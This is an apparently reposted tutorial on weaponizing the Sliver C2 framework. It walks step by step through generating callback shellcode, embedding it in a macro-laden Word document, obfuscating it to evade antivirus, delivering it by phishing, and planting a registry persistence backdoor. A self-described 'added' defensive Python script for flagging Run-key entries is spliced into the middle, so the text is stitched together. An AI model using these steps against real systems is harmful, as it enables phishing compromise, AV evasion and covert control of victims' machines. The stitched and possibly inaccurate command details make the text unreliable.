Tutorial: Sliver C2 with BallisKit MacroPack and ShellcodePack

Sliver is a powerful open-source Command and Control (C2) framework developed by Bishop Fox. This tutorial explains how to weaponize Sliver C2 using BallisKit MacroPack Pro and ShellcodePack to drop implants while evading security solutions.

You Should Know:

1. Setting Up Sliver C2

First, install Sliver on your Linux system:

curl https://sliver.sh/install | sudo bash 

Start the Sliver server:

sliver-server 

2. Generating a Sliver Payload

Generate a shellcode payload for Windows:

generate --mtls your-server-ip --os windows --arch amd64 --format shellcode --save payload.bin 

3. Using BallisKit MacroPack Pro

BallisKit MacroPack Pro helps evade detection by obfuscating macros. Load the shellcode into a Word document:

python3 macro_pack.py -f payload.bin -o malicious_doc.docm --encrypt 

4. ShellcodePack Integration

ShellcodePack further obfuscates the payload to bypass AV:

python3 shellcode_pack.py -i payload.bin -o final_payload.bin --xor --compress 

5. Delivering the Payload

Use a phishing email or web server to deliver the weaponized document:

python3 -m http.server 8080 

6. Establishing C2 Connection

Once executed, the Sliver implant connects back:

sessions -i 

7. Post-Exploitation

Execute commands on the compromised host:

execute -c "whoami" 

8. Persistence

Install a persistent backdoor:

persist -t registry -n "UpdateService" -v "C:\malware.exe" 

What Undercode Say

Sliver C2 combined with BallisKit tools provides a robust method for red team operations. The use of shellcode obfuscation and macro evasion techniques enhances stealth. Below are additional useful commands for cybersecurity professionals:

Linux Commands for C2 Operations

  • Check network connections:
    netstat -tulnp 
    
  • Monitor processes:
    ps aux | grep sliver 
    
  • Extract shellcode from binary:
    objdump -d payload.bin | grep -i "[0-9a-f]:" | cut -f2 
    

Windows Commands for Defense

  • Detect suspicious processes:
    tasklist /v | findstr /i "sliver" 
    
  • Check registry persistence:
    reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Run 
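
For triage, the output of the `reg query` command above can be parsed and each Run value checked against where autostart programs normally live. The Python below is an added example, not code from the original post or from the Sliver or BallisKit projects; the sample output, the trusted-directory list and the script-host list are assumptions constructed for illustration.

```python
import ntpath
import re

# Constructed sample of `reg query` output; the last value mirrors step 8.
SAMPLE = r"""
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run
    SecurityHealth    REG_EXPAND_SZ    %windir%\system32\SecurityHealthSystray.exe
    Vendor Agent    REG_SZ    "C:\Program Files\Vendor\agent.exe" --tray
    Sync Helper    REG_SZ    powershell.exe -File C:\Users\Public\sync.ps1
    UpdateService    REG_SZ    C:\malware.exe
"""

# Assumed allow-list of install roots and script hosts (tune per environment).
VALUE_RE = re.compile(r"^\s{4}(.+?)\s{4}(REG_\w+)\s{4}(.*)$")
ENV = {"%windir%": r"C:\Windows", "%systemroot%": r"C:\Windows",
       "%programfiles%": r"C:\Program Files"}
TRUSTED = ("c:\\windows\\", "c:\\program files\\", "c:\\program files (x86)\\")
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe",
                "cscript.exe", "mshta.exe", "rundll32.exe", "regsvr32.exe"}

def parse_reg_query(text):
    """Return (name, type, data) for every value line of `reg query` output."""
    return [m.groups() for m in map(VALUE_RE.match, text.splitlines()) if m]

def image_path(data):
    """Executable a Run value starts: quoted path, else text up to the extension."""
    for var, val in ENV.items():
        data = re.sub(re.escape(var), lambda _m, v=val: v, data, flags=re.I)
    m = (re.match(r'\s*"([^"]+)"', data)
         or re.match(r"\s*(.+?\.(?:exe|com|bat|cmd|dll))\b", data, re.I))
    return ntpath.normpath(m.group(1)) if m else data.strip()

def assess(data):
    """Reasons a Run value deserves review; an empty list means none were found."""
    path = image_path(data).lower()
    if ntpath.basename(path) in SCRIPT_HOSTS:
        return ["script host or LOLBin used as launcher"]
    if not path.startswith(TRUSTED):
        return ["image not under a trusted install directory"]
    return []

def flag_run_entries(text):
    """Map value name -> reasons, for the entries that should be reviewed."""
    entries = ((name, assess(data)) for name, _type, data in parse_reg_query(text))
    return {name: why for name, why in entries if why}

if __name__ == "__main__":
    for name, why in flag_run_entries(SAMPLE).items():
        print(f"{name}: {'; '.join(why)}")
```

The same check applies to the per-user Run key under HKCU; a flagged value is a lead for review, not proof of compromise.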
    

Expected Output:

A successful Sliver implant execution should return an active session, allowing full control over the target system while maintaining evasion.

Prediction

As EDR solutions improve, red teams will increasingly rely on advanced obfuscation techniques like BallisKit’s tools to bypass defenses. Future C2 frameworks may integrate AI-driven evasion methods.

References:

Reported By: Emeric Nasi – Hackers Feeds